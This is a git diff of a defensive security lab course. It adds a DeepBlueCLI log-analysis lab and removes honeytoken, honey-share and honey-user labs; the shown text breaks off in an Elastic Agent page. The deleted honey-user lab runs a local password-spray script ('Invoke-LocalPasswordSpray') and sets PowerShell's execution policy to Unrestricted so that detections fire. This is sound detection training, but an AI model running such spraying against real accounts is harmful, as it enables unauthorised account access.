diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png
new file mode 100755
index 00000000..916644de
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00.png
new file mode 100755
index 00000000..916644de
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-46-00.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-47-26.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-47-26.png
new file mode 100755
index 00000000..ec4dcd34
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-47-26.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-48-18.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-48-18.png
new file mode 100755
index 00000000..befaf207
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-48-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-52-22.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-52-22.png
new file mode 100755
index 00000000..37654890
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-52-22.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png
new file mode 100755
index 00000000..2063eecd
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-55-12.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-55-12.png
new file mode 100755
index 00000000..d29b569c
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-16-09-55-12.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-23-13-36-10.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-23-13-36-10.png
new file mode 100755
index 00000000..70aeb673
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/Clipboard_2020-06-23-13-36-10.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/OpeningPowershell.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/OpeningPowershell.png
new file mode 100644
index 00000000..6ce0ad48
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/OpeningPowershell.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluespawndetections.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluespawndetections.png
new file mode 100644
index 00000000..b3f0a4ee
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluespawndetections.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluspawnlaunched.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluspawnlaunched.png
new file mode 100644
index 00000000..47e8fa41
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/bluspawnlaunched.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/cdandstartbluespawn.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/cdandstartbluespawn.png
new file mode 100644
index 00000000..87be1d62
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/cdandstartbluespawn.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/crossreference.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/crossreference.png
new file mode 100644
index 00000000..e1bfa310
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/crossreference.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/desktop.ini b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/desktop.ini
new file mode 100755
index 00000000..d6155493
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/desktop.ini
@@ -0,0 +1,2 @@
+[LocalizedFileNames]
+Clipboard_2020-06-12-10-36-44.png=@Clipboard_2020-06-12-10-36-44,0
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/disableDefender.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/disableDefender.png
new file mode 100644
index 00000000..cccd1e66
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/disableDefender.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/installationconfirmation.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/installationconfirmation.png
new file mode 100644
index 00000000..6d184e40
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/installationconfirmation.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/invokeatomicv1.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/invokeatomicv1.png
new file mode 100644
index 00000000..fb45da9d
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/invokeatomicv1.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/openingcommandprompt.png b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/openingcommandprompt.png
new file mode 100644
index 00000000..4a0f6711
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/attachments/openingcommandprompt.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/Canarytokens.md b/IntroClassFiles/Tools/IntroClass/canarytokens/Canarytokens.md
deleted file mode 100644
index e22db84d..00000000
--- a/IntroClassFiles/Tools/IntroClass/canarytokens/Canarytokens.md
+++ /dev/null
@@ -1,127 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
- 
-
-# Canarytokens 
-
-
-First, we will need to navigate to the canarytokens server from a system with Microsoft Word on it: 
-
-https://www.canarytokens.org/generate# 
-
-![image](https://github.com/user-attachments/assets/7ca0b2ac-9072-4336-9ea8-347797f9b74d)
-
-
-
-Now, let's create a token Word Document: 
-
-
-  
-
-![image](https://github.com/user-attachments/assets/ce30b266-57d9-4f8b-8dc2-82783a7a3599)
-
-
-  
-
-Then select Create Token. 
-
-  
-
-When you get the next screen, select Download your MS Word File.  
-
-  
-
-Then, download it and open it. 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-03-10.png) 
-
-  
-
-Notice that it is just an empty Word document. You can add whatever you want in it. 
-
-  
-
-Now, check your email. 
-
-  
-
-You should have gotten an alert: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-04-16.png) 
-
-  
-
-Now, let's play with the site cloner: 
-
-  
-
-Please select New Token in the upper right corner. 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-07-48.png) 
-
-  
-
-Then, select Cloned Website from the dropdown: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-08-21.png) 
-
-  
-
-Next, fill in the appropriate fields: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-09-19.png) 
-
-  
-
-Now, select Create my Canarytoken. 
-
-  
-
-Now we will need to copy the JavaScript and put it somewhere so it triggers: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-11-06.png) 
-
-  
-
-Now, let's surf to https://scriptasylum.com/tutorials/encode-decode.html 
-
-  
-
-Then, simply paste your JavaScript into the first two boxes as you scroll down then click the right arrow to encode: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-18-39.png) 
-
-  
-
-In a few moments you should get an email alert: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-10-19-36.png) 
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-  
-
-  
-
-  
-
-  
-
- 
-
- 
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecli/DeepBlueCLI.md b/IntroClassFiles/Tools/IntroClass/deepbluecli/DeepBlueCLI.md
index 36eb68e5..d7ae4b87 100755
--- a/IntroClassFiles/Tools/IntroClass/deepbluecli/DeepBlueCLI.md
+++ b/IntroClassFiles/Tools/IntroClass/deepbluecli/DeepBlueCLI.md
@@ -6,19 +6,25 @@ DeepBlueCLI is a free tool by **Eric Conrad** that demonstrates some amazing det
 
 Let's get started by opening **Windows Powershell**.
 
-![](attachments/OpeningPowershell.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/49dc1b10-56f2-411a-b27e-37668bbb805a" />
 
 Next, we need to navigate to the **IntroLabs** directory:
 
-<pre>cd \IntroLabs</pre>
+```ps
+cd \IntroLabs
+```
 
 Then, continue into the **DeepBlueCLI-master** directory:
 
-<pre>cd .\DeepBlueCLI-master</pre>
+```ps
+cd .\DeepBlueCLI
+```
 
 Run the following command:
 
-<pre>Set-ExecutionPolicy Unrestricted</pre>
+```ps
+Set-ExecutionPolicy Unrestricted
+```
 
 Most likely, you will be prompted to confirm the change.
 
@@ -30,7 +36,9 @@ It is very common for attackers to add additional users on to a system they have
 
 Now, let’s run a check in the **.evtx** files for adding a new user:
 
-<pre>.\DeepBlue.ps1 .\evtx\new-user-security.evtx</pre>
+```ps
+.\DeepBlue.ps1 .\evtx\new-user-security.evtx
+```
 
 You should see the following:
 
@@ -42,22 +50,29 @@ This is the exact behavior that **UEBA** should be able to detect.
 
 Let's look at an event log with a password spray attack.  This is very much part of what a full **UEBA** solution does:
 
-<pre>.\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx</pre>
+```ps
+.\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
+```
 
 ![](attachments/deepblue_passwordguessing.png)
 
 Same thing with detecting a password spraying attack:
 
-<pre>.\DeepBlue.ps1 .\evtx\password-spray.evtx</pre>
+```ps
+.\DeepBlue.ps1 .\evtx\password-spray.evtx
+```
 
 ![](attachments/deepblue_passwordspray.png)
 
 For fun, let’s look at how **DeepBlueCLI** detects various encoding tactics that attackers use to obfuscate their attacks.  It is very common for attackers to use a number of encoding techniques to bypass signature detection.  However, it is not something that normally happens with standard scripts.
 
-<pre>.\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-encoding-menu.evtx</pre>
+```ps
+.\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-encoding-menu.evtx
+```
 
 ![](attachments/deepblue_powershell-invokeobfuscation.png)
 
+
 ***                                                                 
 <b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/DomainLogReview/DomainLogReview.md)</i></b>
 
@@ -73,3 +88,5 @@ Please be sure to destroy the lab environment!
 
 ---
 
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md
new file mode 100755
index 00000000..68a181c3
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md
@@ -0,0 +1,94 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# DeepBlueCLI
+
+DeepBlueCLI is a free tool by **Eric Conrad** that demonstrates some amazing detection capabilities.  It also has some checks that are effective for showing how **UEBA** style techniques can be in your environment. 
+
+Let's get started by opening **Windows Powershell**.
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/49dc1b10-56f2-411a-b27e-37668bbb805a" />
+
+Next, we need to navigate to the **IntroLabs** directory:
+
+```ps
+cd \IntroLabs
+```
+
+Then, continue into the **DeepBlueCLI-master** directory:
+
+```ps
+cd .\DeepBlueCLI
+```
+
+Run the following command:
+
+```ps
+Set-ExecutionPolicy Unrestricted
+```
+
+Most likely, you will be prompted to confirm the change.
+
+Please enter **"Y"** for Yes.
+
+![](attachments/deepblue_setexecutionpolicy.png)
+
+It is very common for attackers to add additional users on to a system they have compromised.  This gives them a level of persistence that they otherwise would not gain with malware.  Why?  There are lots and lots of tools to detect malware.  By creating an extra user account it allows them to blend in.  
+
+Now, let’s run a check in the **.evtx** files for adding a new user:
+
+```ps
+.\DeepBlue.ps1 .\evtx\new-user-security.evtx
+```
+
+You should see the following:
+
+![](attachments/deepblue_newusersecurity.png)
+
+Another attack that very few **SIEMs** detect is password spraying.  This is where an attacker takes a user list from a domain, and sprays it with the same password, think **"Summer2020"**.  This is effective because it keeps the lockout threshold below the lockout policy and many times flies under the radar simply because accounts are not getting locked out. 
+
+This is the exact behavior that **UEBA** should be able to detect.
+
+Let's look at an event log with a password spray attack.  This is very much part of what a full **UEBA** solution does:
+
+```ps
+.\DeepBlue.ps1 .\evtx\smb-password-guessing-security.evtx
+```
+
+![](attachments/deepblue_passwordguessing.png)
+
+Same thing with detecting a password spraying attack:
+
+```ps
+.\DeepBlue.ps1 .\evtx\password-spray.evtx
+```
+
+![](attachments/deepblue_passwordspray.png)
+
+For fun, let’s look at how **DeepBlueCLI** detects various encoding tactics that attackers use to obfuscate their attacks.  It is very common for attackers to use a number of encoding techniques to bypass signature detection.  However, it is not something that normally happens with standard scripts.
+
+```ps
+.\DeepBlue.ps1 .\evtx\Powershell-Invoke-Obfuscation-encoding-menu.evtx
+```
+
+![](attachments/deepblue_powershell-invokeobfuscation.png)
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/nessusIntroClass/Nessus.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/bluespawnIntroClass/Bluespawn.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png
new file mode 100755
index 00000000..4175daf4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-12-10-36-44.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-06-33.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-06-33.png
new file mode 100755
index 00000000..59b37f53
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-06-33.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-07-43.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-07-43.png
new file mode 100755
index 00000000..87f0cde4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-07-43.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-08-14.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-08-14.png
new file mode 100755
index 00000000..80638a6a
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-08-14.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-10-30.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-10-30.png
new file mode 100755
index 00000000..9c41e8a1
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-10-30.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-14.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-14.png
new file mode 100755
index 00000000..95a5a818
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-14.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-59.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-59.png
new file mode 100755
index 00000000..bb761918
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-15-14-11-59.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png
new file mode 100755
index 00000000..2063eecd
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/Clipboard_2020-06-16-09-53-18.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/OpeningPowershell.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/OpeningPowershell.png
new file mode 100644
index 00000000..6ce0ad48
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/OpeningPowershell.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_newusersecurity.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_newusersecurity.png
new file mode 100644
index 00000000..7a7a9476
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_newusersecurity.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordguessing.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordguessing.png
new file mode 100644
index 00000000..ec721477
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordguessing.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordspray.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordspray.png
new file mode 100644
index 00000000..16133989
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_passwordspray.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_powershell-invokeobfuscation.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_powershell-invokeobfuscation.png
new file mode 100644
index 00000000..265e18b4
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_powershell-invokeobfuscation.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_setexecutionpolicy.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_setexecutionpolicy.png
new file mode 100644
index 00000000..11a33913
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/deepblue_setexecutionpolicy.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/desktop.ini b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/desktop.ini
new file mode 100755
index 00000000..c0c44609
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/desktop.ini
@@ -0,0 +1,3 @@
+[LocalizedFileNames]
+Clipboard_2020-06-12-10-36-44.png=@Clipboard_2020-06-12-10-36-44,0
+Clipboard_2020-06-16-09-53-18.png=@Clipboard_2020-06-16-09-53-18,0
diff --git a/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/openingcommandprompt.png b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/openingcommandprompt.png
new file mode 100644
index 00000000..4a0f6711
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/attachments/openingcommandprompt.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/honeyshare/HoneyShare.md b/IntroClassFiles/Tools/IntroClass/honeyshare/HoneyShare.md
deleted file mode 100644
index 7b454508..00000000
--- a/IntroClassFiles/Tools/IntroClass/honeyshare/HoneyShare.md
+++ /dev/null
@@ -1,115 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
- 
-
-# Honey Share 
-
-  
-
-In this lab we will be creating and triggering a honey share.  The goal of this lab is to show how to set up a simple Impacket SMB server that can record attempted connections to it. 
-
-  
-
-This can be used for detecting lateral movement in a Windows environment.  
-
-  
-
-One of the cool things about this is it will track the compromised user, the system and the password hash of the compromised user account. 
-
-  
-
-Let's get started. 
-
-  
-
-
-
-First, we will need to open an Kali Linux Prompt: 
-
-![image](https://github.com/user-attachments/assets/4890f6f1-bea0-4419-a588-3e6594c9118f)
-
-
-
-Let's get our IP address. 
-
-  
-
-`ifconfig` 
-
-  
-![image](https://github.com/user-attachments/assets/aed53ef8-6796-4897-ba51-c1a4a09f1b24)
-
-Next, we will become root and navigate to the Impacket directory: 
-
-  
-
-`sudo su -` 
-
-  
-
-`cd /opt/impacket/examples` 
-
-  
-
-It should look like this: 
-
-  
-
-![image](https://github.com/user-attachments/assets/e5cbc8eb-b3a8-4fe6-84c2-569e6fed013c)
-
-
-Now, let's start the SMB server: 
-
-  
-
-`python3 ./smbserver.py -smb2support -comment 'secret' SECRET /secret` 
-
-  
-
-It should look like this: 
-
- ![image](https://github.com/user-attachments/assets/d1268c27-a141-4a95-96ce-a9482d4b3e56)
- 
-
-
-Next, let's open a Windows Command Prompt: 
-
-![image](https://github.com/user-attachments/assets/0ccc949d-32c3-4d7b-bb18-1bb39ee36dfc)
-  
-
-
-Then, attempt to mount the share from your Windows system: 
-
-
-`net use * \\172.17.78.175\secret` 
-
-Remember!  Your IP address may be different!!! 
-  
-
-We did the most basic level of attempted authentication to the share, and it generated an error.  
-
-![image](https://github.com/user-attachments/assets/8d861109-cd62-4231-946a-98f2284466a6)
-
-
-However, the trap was triggered! 
-
-  
-
-Go back to your Kali Linux terminal and see the log data. 
-
-
-It should look like this: 
-
-![image](https://github.com/user-attachments/assets/4b3291a4-fbd1-49a6-968f-f72caefc403a)
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-
-  
-
- 
-
-  
-
- 
-
- 
diff --git a/IntroClassFiles/Tools/IntroClass/honeyuser/honeyuser.md b/IntroClassFiles/Tools/IntroClass/honeyuser/honeyuser.md
deleted file mode 100644
index 4efff569..00000000
--- a/IntroClassFiles/Tools/IntroClass/honeyuser/honeyuser.md
+++ /dev/null
@@ -1,210 +0,0 @@
-![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
- 
-
-# Honey User 
-
-  
-
-In this lab we will be setting up a poor persons SIEM with an "alert" generated whenever the Honey Account Frank is accessed. 
-
-  
-
-Why Frank? 
-
-  
-
-Because. 
-
-  
-
-Let's get started. 
-
-  
-
-First, we will need to create the users and the Frank account. 
-
-Let's open a command prompt:
-
-![image](https://github.com/user-attachments/assets/1abaf0d9-e8ed-4bfb-afab-1de17ad0f081)
-
-
-
-Now, we will need to navigate to the C:\IntroLabs directory and add the example users and Frank. 
-
-  
-
-`cd \IntroLabs` 
-
-  
-
-`200-user-gen.bat` 
-
-  
-
-It should look like this: 
-
-  
-![image](https://github.com/user-attachments/assets/d659078e-4504-4e8e-9800-b15db7aebb64)
-
-
-  
-
-Now, we need to create the Custom View in event viewer to capture anytime someone logs in as Frank. 
-
-  
-
-To do this click the Windows Start button then type Event Viewer. 
-
-  
-
-It should look like this: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-16-35.png) 
-
-  
-
-When in the Event Viewer, select Windows Logs > Security then Create Custom View on the far-right hand side. 
-
-  
-
-It should look like this: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-18-15.png) 
-
-When Create Custom View opens, please select XML: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-19-02.png) 
-
-  
-
-Then, select Edit query Manually, Press Yes on the Alert Box and then replace the text in the query with the text below: 
-
-~~~~~~ 
-<QueryList>
-  <Query Id="0" Path="Security">
-    <Select Path="Security">* [EventData[Data[@Name='TargetUserName']='Frank']]</Select>
-  </Query>
-</QueryList>
-
-~~~~~~
-
-It should look like this: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-21-57.png) 
-
-  
-
-Now, press OK. 
-
-  
-
-When the Save Filter to Custom View box opens, name the filter Frank then press OK. 
-
-
-When we click on our new View we will see the Events associated with the Frank Account Being Created: 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-24-20.png) 
-
-  
-
-Now, let's trip a few more. 
-
-  
-
-Back at your Windows Command Prompt 
-
-  
-
-  
-
-
-`cd \IntroLabs`
-
-
- `powershell` 
-
-  
-
- `Set-ExecutionPolicy Unrestricted` 
-
-  
-
- `Import-Module .\LocalPasswordSpray.ps1` 
-
-  
-
-It should look like this: 
-
-  
-![image](https://github.com/user-attachments/assets/04441fb8-95ba-441c-8ccd-a18027b064da)
-
-
-  
-
-Now, let’s try some password spraying against the local system! 
-
-  
-
-  
-`Invoke-LocalPasswordSpray -Password Winter2020` 
-
-  
-
-It should look like this: 
-
-  ![image](https://github.com/user-attachments/assets/42e83694-5305-411e-bae8-b28f4cbb7598)
-
-
-
-  
-
-Now we need to clean up and make sure the system is ready for the rest of the labs: 
-
-  
-`exit` 
-
-  
-
-`user-remove.bat` 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-30-08.png) 
-
-  
-
-Now, let's see if any alerts were generated. 
-
-  
-
-Go back to your Event Viewer and refresh (Action > Refresh). 
-
-  
-
-You should see the "Alerts"! 
-
-  
-
-![](attachment/Clipboard_2021-03-12-11-32-18.png) 
-
-  
-
-Just for a bit of reference.  We did this locally as an example of setting this up on a full SIEM.  We did it in less than 20 min.  Your SIEM team working with your AD Ops team should be able to pull this off. 
-
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
-  
-
- 
-
- 
diff --git a/IntroClassFiles/Tools/IntroClass/md/elastic_agent.md b/IntroClassFiles/Tools/IntroClass/md/elastic_agent.md
deleted file mode 100644
index 16a61205..00000000
--- a/IntroClassFiles/Tools/IntroClass/md/elastic_agent.md
+++ /dev/null
@@ -1,70 +0,0 @@
-#### Elastic Agents
----
-
-!!! - This is part two of a three-part series.
-	[Part One](./elk_in_the_cloud.md "Elk in the Cloud")
-	[Part Three](./sysmon_logs.md "Configuring Sysmon")
-
----
-
-In part one, we started an ELK instance in the Elastic Cloud.
-
-The Elastic Agent software enables users to easily send logs to our ELK instance, a process typically called **"ingesting."**
-
-**1. Download the Elastic Agent.**
-
-Press the **Powershell** icon in the taskbar to launch **Windows Powershell**.
-
-![Powershell](./images/OpeningPowershell.png)
-
-Copy the command you saved in the file.  In my case, it was **"agent.txt"** and paste it into the **powershell**. 
-
-No need to hit enter, as it will run each line of code separately when you paste it in!
-
-![Powershell](./images/powershell.png)
-
-Make sure you type **y** and hit enter when prompted by powershell.
-
-Switch back over to your browser and you should see **"1 Agent has been enrolled".**
-
-![Enrolled Machine](./images/finish_button.PNG)
-
-Then Click **"Add to Integration"**.
-
-On the next page leave everything default and click **"Confirm Incoming Data".**
-
-![Confirm Data](./images/confirm_data.PNG)
-
-The browser will take a few seconds to confirm the machine is connected, once thats finished click **"View Assets".**
-
-![Enrolled](./images/successful_enroll.PNG)
-
-**2. Check The Fleet.**
-
-We should be connected and ready for **part 3**.  Lets make sure the device has successfully connected.
-
-Click the hamburger at the top left of the window and scroll down almost all the way to the bottom. Click the option **"Fleet"**.
-
-![Fleet](./images/fleet_loc.PNG)
-
-This allows us to view our **agent policies**.
-
